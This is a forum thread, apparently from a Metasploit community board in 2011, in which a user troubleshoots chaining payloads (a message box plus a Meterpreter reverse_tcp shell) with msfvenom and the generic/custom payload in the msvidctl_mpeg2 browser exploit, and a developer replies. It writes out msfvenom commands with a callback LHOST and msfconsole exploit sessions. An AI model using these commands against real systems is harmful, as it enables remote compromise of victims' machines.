8 Replies Latest reply on Oct 28, 2011 8:57 PM by dig2play

    MSF4 custom/generic with multipayloads

      Hi everyone.

      I've been playing around with the newer MSF4 (Framework: 4.1.0-release.13988, Console  : 4.1.0-release.13581) multipayload support using msfvenom and the custom/generic payload, but there seems to be a dearth of information on what the payload supports in terms of encodings and compatibility.

      Basically I'm looking at how a server-side service can be shut down, then have the meterpreter listen on its no-longer-bound port. (The exploit would come in on another port.)

      Essentially I created a multipayload using msfvenom with the msgbox and Meterpreter back-to-back, as an exe, raw, and .rb. I've tried leaving the encoding setting alone, and setting it to None. (Note that the custom/generic payload .rb source says something about only allowing None encoding.)

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw

      I also tried it with EXITFUNC set to "none":

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none> test\msgterp.raw

      Then I need to write the raw multipayload to something that the generic/custom payload can use: (note I've tried writing to raw, exe, and .rb formats)

      c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw

      Finally it's time to try the multipayload out with generic/custom: (note that I reloaded the exploit each time before trying to set and exploit)

      msf > use exploit/windows/browser/msvidctl_mpeg2

      msf  exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom

      PAYLOAD => generic/custom

      msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw

      PAYLOADSTR => c:\metasploit\test\msf.raw

      msf  exploit(msvidctl_mpeg2) > exploit

      [-] Exploit failed: No encoders encoded the buffer successfully.

      msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe

      PAYLOADSTR => c:\metasploit\test\msf.exe

      msf  exploit(msvidctl_mpeg2) > exploit

      [-] Exploit failed: No encoders encoded the buffer successfully.

      msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw

      PAYLOADFILE => c:\metasploit\test\msf.raw

      msf  exploit(msvidctl_mpeg2) > exploit

      [-] Exploit failed: No encoders encoded the buffer successfully.

      msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe

      PAYLOADFILE => c:\metasploit\test\msf.exe

      msf  exploit(msvidctl_mpeg2) > exploit

      [-] Exploit failed: No encoders encoded the buffer successfully.

      So I found an explanation of what the "No encoders encoded..." error is supposed to mean (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions). This is where stager payloads come in, I suppose.

      Is the cause of the error the windows/msgbox payload because it's not staged? Or is it that multipayloads aren't staged? If it's the latter, then I can't see how multipayloads would ever work unless they were staged. Combining 2 payloads would likely be larger than a single payload.

      Can someone please at least explain the encodings and formats that should be compatible with the generic/payload payload so I can rule that out? I've only found a couple of references to multipayload support.

      Thanks in advance! I promise to reply with how I got this working once I do.

        • Re: MSF4 custom/generic with multipayloads

          Just a quick update. I tried a simple, single custom payload from meterpreter and messagebox. Both are larger than 200 bytes, meaning they would have to be staged. (Even the messagebox?) I still get the "No encoders encoded" error with either.

          c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f rb -e generic/none LHOST=192.168.1.100 EXITFUNC=thread > test\msgbox.rb

          [*] generic/none succeeded with size 270 (iteration=1)

          c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none LHOST=192.168.1.100 EXITFUNC=thread > GENESIS\msgbox.raw

          [*] generic/none succeeded with size 270 (iteration=1)

          Is multipayload support staging compatible? Is it only expected to be used in a payload file drop? How does multipayload work with staging? Here's the few useful tidbits I've found on the topic:

          http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/

          http://dev.metasploit.com/redmine/issues/4714 # Note that bug #4714 is a msfvenom enhancement, and the multipayload shown is msgbox/meterpreter as I am also trying. However it doesn't go beyond creating the .exe.

          Knowing if a custom multipayload is possible with the MSF console would save a lot of time.

          Thanks!

            • Re: MSF4 custom/generic with multipayloads
              hdmoore

              Exploit modules do not use external files to specify payloads; they generate them on the fly based on the PAYLOAD module setting and the datastore options.

                • Re: MSF4 custom/generic with multipayloads

                  Thanks for the quick reply.

                  My confusion is that the generic/custom payload module, which I assume to be compatible with exploit modules, seems to be available for the sole purpose of specifying an external payload file. Its info describes it as being able to "Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.", where "PAYLOADFILE, The file to read the payload from".

                  http://www.metasploit.com/modules/payload/generic/custom

                  I know this blog post on MSF 4.01 isn't from the Rapid7 site itself, but it seems pretty knowledgeable on the newer multipayload and generic/custom support in 4.01.

                  http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/

                  "Generic/custom

                  The first change was an addition of a single custom payload. Prior to this, a custom payload existed for command execution exploits for UNIX (payload/cmd/unix/generic) but there was no analogous payload for command execution exploits for Windows, or for that matter any other architecture or platform. If you are developing a payload that could benefit from Metasploit integration, writing a payload module is preferable. But in some cases, such as generating multiple payloads, Metasploit might not currently support the UI or backend to generate the payload in a conventional way, and you may want to import the payload from a file or option. Or while writing a payload, it can be easier to import a payload into the framework than change a module."

                  Maybe I misinterpreted your reply and I should understand it as, "The external payload files generated by msfvenom are in no way compatible with msf as an exploit payload", and that the generic/custom module is for 100% intact payload .rb source? (I'm still confused as to whether multipayloads are possible.)

                  Sorry for all the questions. Your reply was my understanding before I started trying to figure out if multiple or chain payloads were possible without having to write a custom payload with everything thrown in at once.

                  Thank you.

                    • Re: MSF4 custom/generic with multipayloads
                      hdmoore

                      Ah - I missed that setting in your previous log. That should work, but it may be buggy; it's not a use case we test often (or one I have ever tried). The issue may be that the selected payload is too big for the exploit; make sure it is less than the Payload Size field in the "info" output and leave some room for the overhead of a decoder (30-40 bytes).

                        • Re: MSF4 custom/generic with multipayloads

                          Thanks! That helps!

                          Yes, from the "[-] Exploit failed: No encoders encoded the buffer successfully" I understood that the single payload size was greater than the exploit would allow, but the sizes msfvenom is producing are under this limit.

                          > use msvidctl_mpeg2

                          > info

                          ...

                          Payload information:

                            Space: 1024

                            Avoid: 6 characters

                          I tried a windows/exec payload with CMD="msg %username% 'test'"; the resulting size is 208 with no encoding. It failed to exploit with "No encoders encoded the buffer successfully".

                          I also tried, for fun, to encode the payload with the x86/shikata_ga_nai encoder, but it kind of bumped the size up to 235 with no success.

                          Maybe I'm using the generic/custom payload module incorrectly. Or do you think I should try to switch back to msfpayload/msfencode? I could try a million permutations and not know which one was the closest, unless it worked.

                          Thanks again.